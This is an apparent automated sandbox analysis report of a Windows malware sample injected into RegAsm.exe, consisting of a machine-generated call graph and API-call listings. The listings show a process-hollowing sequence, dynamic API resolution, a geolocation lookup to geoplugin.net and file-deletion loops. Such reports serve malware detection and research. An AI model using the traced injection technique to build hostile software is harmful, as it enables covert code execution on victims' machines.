DeleteCriticalSection 54908->54925 54910->54896 54911 43a46c 54910->54911 54940 438e14 54911->54940 54913 43a476 54914 43a481 54913->54914 54945 438ec2 6 API calls try_get_function 54913->54945 54914->54898 54916 43a48f 54917 43a49c 54916->54917 54946 43a49f 6 API calls ___vcrt_FlsFree 54916->54946 54917->54898 54919->54896 54926 438cf3 54920->54926 54923 438f36 InitializeCriticalSectionAndSpinCount 54924 438f22 54923->54924 54924->54906 54925->54910 54927 438d23 54926->54927 54928 438d27 54926->54928 54927->54928 54929 438d47 54927->54929 54933 438d93 54927->54933 54928->54923 54928->54924 54929->54928 54931 438d53 GetProcAddress 54929->54931 54932 438d63 __crt_fast_encode_pointer 54931->54932 54932->54928 54934 438dbb LoadLibraryExW 54933->54934 54939 438db0 54933->54939 54935 438dd7 GetLastError 54934->54935 54936 438def 54934->54936 54935->54936 54937 438de2 LoadLibraryExW 54935->54937 54938 438e06 FreeLibrary 54936->54938 54936->54939 54937->54936 54938->54939 54939->54927 54941 438cf3 try_get_function 5 API calls 54940->54941 54942 438e2e 54941->54942 54943 438e46 TlsAlloc 54942->54943 54944 438e37 54942->54944 54944->54913 54945->54916 54946->54914 54950 44fc01 54947->54950 54948 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54949 43464e 54948->54949 54949->54588 54949->54904 54950->54948 54952 44f0e2 54951->54952 54954 44f0eb 54951->54954 54956 44efd8 54952->54956 54954->54604 54955->54604 54957 448295 _Atexit 36 API calls 54956->54957 54958 44efe5 54957->54958 54976 44f0f7 54958->54976 54960 44efed 54985 44ed6c 54960->54985 54963 44f004 54963->54954 54966 44f047 54969 446802 _free 20 API calls 54966->54969 54969->54963 54970 44f042 55009 44062d 20 API calls _Atexit 54970->55009 54972 44f08b 54972->54966 55010 44ec42 20 API calls 54972->55010 54973 44f05f 54973->54972 54974 446802 _free 20 API calls 54973->54974 54974->54972 54977 44f103 ___scrt_is_nonwritable_in_current_image 54976->54977 54978 448295 _Atexit 36 API calls 
54977->54978 54983 44f10d 54978->54983 54980 44f191 ___scrt_is_nonwritable_in_current_image 54980->54960 54983->54980 54984 446802 _free 20 API calls 54983->54984 55011 446175 36 API calls 4 library calls 54983->55011 55012 445909 EnterCriticalSection 54983->55012 55013 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 54983->55013 54984->54983 54986 43a837 __cftoe 36 API calls 54985->54986 54987 44ed7e 54986->54987 54988 44ed8d GetOEMCP 54987->54988 54989 44ed9f 54987->54989 54990 44edb6 54988->54990 54989->54990 54991 44eda4 GetACP 54989->54991 54990->54963 54992 4461b8 54990->54992 54991->54990 54993 4461f6 54992->54993 54994 4461c6 ___crtLCMapStringA 54992->54994 55015 44062d 20 API calls _Atexit 54993->55015 54994->54993 54995 4461e1 RtlAllocateHeap 54994->54995 55014 443001 7 API calls 2 library calls 54994->55014 54995->54994 54997 4461f4 54995->54997 54997->54966 54999 44f199 54997->54999 55000 44ed6c 38 API calls 54999->55000 55003 44f1b8 55000->55003 55001 44f1bf 55002 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 55001->55002 55004 44f03a 55002->55004 55003->55001 55005 44f209 IsValidCodePage 55003->55005 55008 44f22e ___scrt_get_show_window_mode 55003->55008 55004->54970 55004->54973 55005->55001 55006 44f21b GetCPInfo 55005->55006 55006->55001 55006->55008 55016 44ee44 GetCPInfo 55008->55016 55009->54966 55010->54966 55011->54983 55012->54983 55013->54983 55014->54994 55015->54997 55017 44ef28 55016->55017 55021 44ee7e 55016->55021 55020 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 55017->55020 55023 44efd4 55020->55023 55026 4511ac 55021->55026 55023->55001 55025 44aee6 _swprintf 41 API calls 55025->55017 55027 43a837 __cftoe 36 API calls 55026->55027 55028 4511cc MultiByteToWideChar 55027->55028 55031 45120a 55028->55031 55038 4512a2 55028->55038 55030 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 55034 44eedf 55030->55034 55032 45122b __alloca_probe_16 
___scrt_get_show_window_mode 55031->55032 55033 4461b8 ___crtLCMapStringA 21 API calls 55031->55033 55035 45129c 55032->55035 55037 451270 MultiByteToWideChar 55032->55037 55033->55032 55040 44aee6 55034->55040 55045 435ecd 20 API calls _free 55035->55045 55037->55035 55039 45128c GetStringTypeW 55037->55039 55038->55030 55039->55035 55041 43a837 __cftoe 36 API calls 55040->55041 55042 44aef9 55041->55042 55046 44acc9 55042->55046 55045->55038 55047 44ace4 ___crtLCMapStringA 55046->55047 55048 44ad0a MultiByteToWideChar 55047->55048 55049 44ad34 55048->55049 55050 44aebe 55048->55050 55054 4461b8 ___crtLCMapStringA 21 API calls 55049->55054 55056 44ad55 __alloca_probe_16 55049->55056 55051 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 55050->55051 55052 44aed1 55051->55052 55052->55025 55053 44ad9e MultiByteToWideChar 55055 44adb7 55053->55055 55068 44ae0a 55053->55068 55054->55056 55073 448c33 55055->55073 55056->55053 55056->55068 55060 44ae19 55062 4461b8 ___crtLCMapStringA 21 API calls 55060->55062 55066 44ae3a __alloca_probe_16 55060->55066 55061 44ade1 55064 448c33 _strftime 11 API calls 55061->55064 55061->55068 55062->55066 55063 44aeaf 55081 435ecd 20 API calls _free 55063->55081 55064->55068 55066->55063 55067 448c33 _strftime 11 API calls 55066->55067 55069 44ae8e 55067->55069 55082 435ecd 20 API calls _free 55068->55082 55069->55063 55070 44ae9d WideCharToMultiByte 55069->55070 55070->55063 55071 44aedd 55070->55071 55083 435ecd 20 API calls _free 55071->55083 55074 44854a _Atexit 5 API calls 55073->55074 55075 448c5a 55074->55075 55078 448c63 55075->55078 55084 448cbb 10 API calls 3 library calls 55075->55084 55077 448ca3 LCMapStringW 55077->55078 55079 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 55078->55079 55080 448cb5 55079->55080 55080->55060 55080->55061 55080->55068 55081->55068 55082->55050 55083->55068 55084->55077 55086 41cc20 LoadLibraryA GetProcAddress 55085->55086 55087 41cc10 
GetModuleHandleA GetProcAddress 55085->55087 55088 41cc49 44 API calls 55086->55088 55089 41cc39 LoadLibraryA GetProcAddress 55086->55089 55087->55086 55088->54609 55089->55088 55394 41b539 FindResourceA 55090->55394 55093 43bda0 _Yarn 21 API calls 55094 40f428 ctype 55093->55094 55095 4020b7 28 API calls 55094->55095 55096 40f443 55095->55096 55097 401fe2 28 API calls 55096->55097 55098 40f44e 55097->55098 55099 401fd8 11 API calls 55098->55099 55100 40f457 55099->55100 55101 43bda0 _Yarn 21 API calls 55100->55101 55102 40f468 ctype 55101->55102 55397 406e13 55102->55397 55104 40f49b 55104->54611 55106 40fb5e 55105->55106 55108 40fb65 55105->55108 55400 402163 11 API calls 55106->55400 55108->54619 55401 401fab 55109->55401 55290->54626 55291->54635 55292->54639 55295 4020df 11 API calls 55294->55295 55296 406c65 55295->55296 55297 4032a0 28 API calls 55296->55297 55298 406c82 55297->55298 55298->54660 55300 40ebdf 55299->55300 55301 4135ae RegQueryValueExA RegCloseKey 55299->55301 55300->54657 55300->54674 55301->55300 55302->54665 55392->54684 55395 41b556 LoadResource LockResource SizeofResource 55394->55395 55396 40f419 55394->55396 55395->55396 55396->55093 55398 4020b7 28 API calls 55397->55398 55399 406e27 55398->55399 55399->55104 55400->55108 55714 4129da 55715 4129ec 55714->55715 55716 4041a2 28 API calls 55715->55716 55717 4129ff 55716->55717 55718 4020f6 28 API calls 55717->55718 55719 412a0e 55718->55719 55720 4020f6 28 API calls 55719->55720 55721 412a1d 55720->55721 55722 41beac 28 API calls 55721->55722 55723 412a26 55722->55723 55724 412ace 55723->55724 55726 401e65 22 API calls 55723->55726 55725 401e8d 11 API calls 55724->55725 55727 412ad7 55725->55727 55728 412a3d 55726->55728 55729 401fd8 11 API calls 55727->55729 55730 4020f6 28 API calls 55728->55730 55731 412ae0 55729->55731 55732 412a48 55730->55732 55733 401fd8 11 API calls 55731->55733 55734 401e65 22 API calls 55732->55734 55735 412ae8 55733->55735 55736 412a53 55734->55736 55737 
4020f6 28 API calls 55736->55737 55738 412a5e 55737->55738 55739 401e65 22 API calls 55738->55739 55740 412a69 55739->55740 55741 4020f6 28 API calls 55740->55741 55742 412a74 55741->55742 55743 401e65 22 API calls 55742->55743 55744 412a7f 55743->55744 55745 4020f6 28 API calls 55744->55745 55746 412a8a 55745->55746 55747 401e65 22 API calls 55746->55747 55748 412a95 55747->55748 55749 4020f6 28 API calls 55748->55749 55750 412aa0 55749->55750 55751 401e65 22 API calls 55750->55751 55752 412aae 55751->55752 55753 4020f6 28 API calls 55752->55753 55754 412ab9 55753->55754 55758 412aef GetModuleFileNameW 55754->55758 55757 404e26 99 API calls 55757->55724 55759 4020df 11 API calls 55758->55759 55760 412b1a 55759->55760 55761 4020df 11 API calls 55760->55761 55762 412b26 55761->55762 55763 4020df 11 API calls 55762->55763 55785 412b32 55763->55785 55764 40da23 32 API calls 55764->55785 55765 401fd8 11 API calls 55765->55785 55766 41ba09 43 API calls 55766->55785 55767 4185a3 31 API calls 55767->55785 55768 412c58 Sleep 55768->55785 55769 40417e 28 API calls 55769->55785 55770 4042fc 84 API calls 55770->55785 55771 40431d 28 API calls 55771->55785 55772 401f09 11 API calls 55772->55785 55773 412cfa Sleep 55773->55785 55774 403014 28 API calls 55774->55785 55775 412d9c Sleep 55775->55785 55776 41c516 32 API calls 55776->55785 55777 412dff DeleteFileW 55777->55785 55778 412e36 DeleteFileW 55778->55785 55779 412e88 Sleep 55779->55785 55780 412e72 DeleteFileW 55780->55785 55781 412f01 55782 401f09 11 API calls 55781->55782 55783 412f0d 55782->55783 55784 401f09 11 API calls 55783->55784 55786 412f19 55784->55786 55785->55764 55785->55765 55785->55766 55785->55767 55785->55768 55785->55769 55785->55770 55785->55771 55785->55772 55785->55773 55785->55774 55785->55775 55785->55776 55785->55777 55785->55778 55785->55779 55785->55780 55785->55781 55789 412ecd Sleep 55785->55789 55787 401f09 11 API calls 55786->55787 55788 412f25 55787->55788 55790 40b93f 28 API calls 
55788->55790 55791 401f09 11 API calls 55789->55791 55792 412f38 55790->55792 55796 412edd 55791->55796 55794 4020f6 28 API calls 55792->55794 55793 401f09 11 API calls 55793->55796 55795 412f58 55794->55795 55905 413268 55795->55905 55796->55785 55796->55793 55797 412eff 55796->55797 55797->55788 55800 401f09 11 API calls 55801 412f6f 55800->55801 55802 4130e3 55801->55802 55803 412f8f 55801->55803 55804 41bdaf 28 API calls 55802->55804 55805 41bdaf 28 API calls 55803->55805 55806 4130ec 55804->55806 55807 412f9b 55805->55807 55808 402f31 28 API calls 55806->55808 55809 41bc1f 28 API calls 55807->55809 55810 413123 55808->55810 55811 412fb5 55809->55811 55812 402f10 28 API calls 55810->55812 55813 402f31 28 API calls 55811->55813 55814 413132 55812->55814 55815 412fe5 55813->55815 55816 402f10 28 API calls 55814->55816 55817 402f10 28 API calls 55815->55817 55818 41313e 55816->55818 55819 412ff4 55817->55819 55820 402f10 28 API calls 55818->55820 55821 402f10 28 API calls 55819->55821 55822 41314d 55820->55822 55823 413003 55821->55823 55824 402f10 28 API calls 55822->55824 55825 402f10 28 API calls 55823->55825 55827 41315c 55824->55827 55826 413012 55825->55826 55829 402f10 28 API calls 55826->55829 55828 402f10 28 API calls 55827->55828 55830 41316b 55828->55830 55831 413021 55829->55831 55832 402f10 28 API calls 55830->55832 55833 402f10 28 API calls 55831->55833 55834 41317a 55832->55834 55835 41302d 55833->55835 55836 402ea1 28 API calls 55834->55836 55837 402f10 28 API calls 55835->55837 55838 413184 55836->55838 55839 413039 55837->55839 55840 404aa1 61 API calls 55838->55840 55841 402ea1 28 API calls 55839->55841 55842 413191 55840->55842 55843 413048 55841->55843 55844 401fd8 11 API calls 55842->55844 55845 402f10 28 API calls 55843->55845 55846 41319d 55844->55846 55847 413054 55845->55847 55848 401fd8 11 API calls 55846->55848 55849 402ea1 28 API calls 55847->55849 55850 4131a9 55848->55850 55851 41305e 55849->55851 55852 401fd8 11 API calls 
55850->55852 55853 404aa1 61 API calls 55851->55853 55854 4131b5 55852->55854 55855 41306b 55853->55855 55856 401fd8 11 API calls 55854->55856 55857 401fd8 11 API calls 55855->55857 55859 4131c1 55856->55859 55858 413074 55857->55858 55861 401fd8 11 API calls 55858->55861 55860 401fd8 11 API calls 55859->55860 55862 4131ca 55860->55862 55863 41307d 55861->55863 55864 401fd8 11 API calls 55862->55864 55865 401fd8 11 API calls 55863->55865 55866 4131d3 55864->55866 55867 413086 55865->55867 55868 401fd8 11 API calls 55866->55868 55869 401fd8 11 API calls 55867->55869 55870 4130d7 55868->55870 55871 41308f 55869->55871 55873 401fd8 11 API calls 55870->55873 55872 401fd8 11 API calls 55871->55872 55874 41309b 55872->55874 55875 4131e5 55873->55875 55876 401fd8 11 API calls 55874->55876 55877 401f09 11 API calls 55875->55877 55878 4130a7 55876->55878 55879 4131f1 55877->55879 55880 401fd8 11 API calls 55878->55880 55881 401fd8 11 API calls 55879->55881 55882 4130b3 55880->55882 55883 4131fd 55881->55883 55884 401fd8 11 API calls 55882->55884 55885 401fd8 11 API calls 55883->55885 55886 4130bf 55884->55886 55887 413209 55885->55887 55888 401fd8 11 API calls 55886->55888 55890 401fd8 11 API calls 55887->55890 55889 4130cb 55888->55889 55892 401fd8 11 API calls 55889->55892 55891 413215 55890->55891 55893 401fd8 11 API calls 55891->55893 55892->55870 55894 413221 55893->55894 55895 401fd8 11 API calls 55894->55895 55896 41322d 55895->55896 55897 401fd8 11 API calls 55896->55897 55898 413239 55897->55898 55899 401fd8 11 API calls 55898->55899 55900 413245 55899->55900 55901 401fd8 11 API calls 55900->55901 55902 413251 55901->55902 55903 401fd8 11 API calls 55902->55903 55904 412abe 55903->55904 55904->55757 55906 4132a6 55905->55906 55908 413277 55905->55908 55907 4132b5 55906->55907 55917 10001c5b 55906->55917 55909 40417e 28 API calls 55907->55909 55921 411d2d 55908->55921 55911 4132c1 55909->55911 55913 401fd8 11 API calls 55911->55913 55915 412f63 55913->55915 

                          Control-flow Graph

                          APIs
                          • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                          • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                          • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                          • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                          • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                          • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad$HandleModule
                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                          • API String ID: 4236061018-3687161714
                          • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                          • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                          • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                          • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                          Control-flow Graph

                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                          • GetProcAddress.KERNEL32(00000000), ref: 00418174
                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                          • GetProcAddress.KERNEL32(00000000), ref: 00418188
                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                          • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                          • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                          • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                          • ReadProcessMemory.KERNEL32 ref: 004182A6
                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
                          • NtClose.NTDLL(?), ref: 00418332
                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                          • WriteProcessMemory.KERNEL32 ref: 00418446
                          • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                          • ResumeThread.KERNEL32(?), ref: 00418470
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                          • GetCurrentProcess.KERNEL32(?), ref: 00418492
                          • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                          • NtClose.NTDLL(?), ref: 004184A3
                          • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                          • GetLastError.KERNEL32 ref: 004184B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                          • API String ID: 316982871-3035715614
                          • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                          • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                          • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                          • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59

                          Control-flow Graph

                          APIs
                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                          • lstrcatW.KERNEL32(?,?), ref: 10001151
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                          • FindClose.KERNEL32(00000000), ref: 100011DB
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                          • String ID:
                          • API String ID: 1083526818-0
                          • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                          • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                          • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                          • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                            • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                            • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                          • Sleep.KERNEL32(00000BB8), ref: 0040F896
                          • ExitProcess.KERNEL32 ref: 0040F905
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseExitOpenProcessQuerySleepValue
                          • String ID: 5.1.2 Pro$`.|$override$pth_unenc
                          • API String ID: 2281282204-2557566216
                          • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                          • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                          • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                          • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF

                          Control-flow Graph

                          APIs
                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                          • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                          • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                          Strings
                          • http://geoplugin.net/json.gp, xrefs: 0041B448
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleOpen$FileRead
                          • String ID: http://geoplugin.net/json.gp
                          • API String ID: 3121278467-91888290
                          • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                          • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                          • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                          • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                          APIs
                            • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                          • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                          • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                            • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
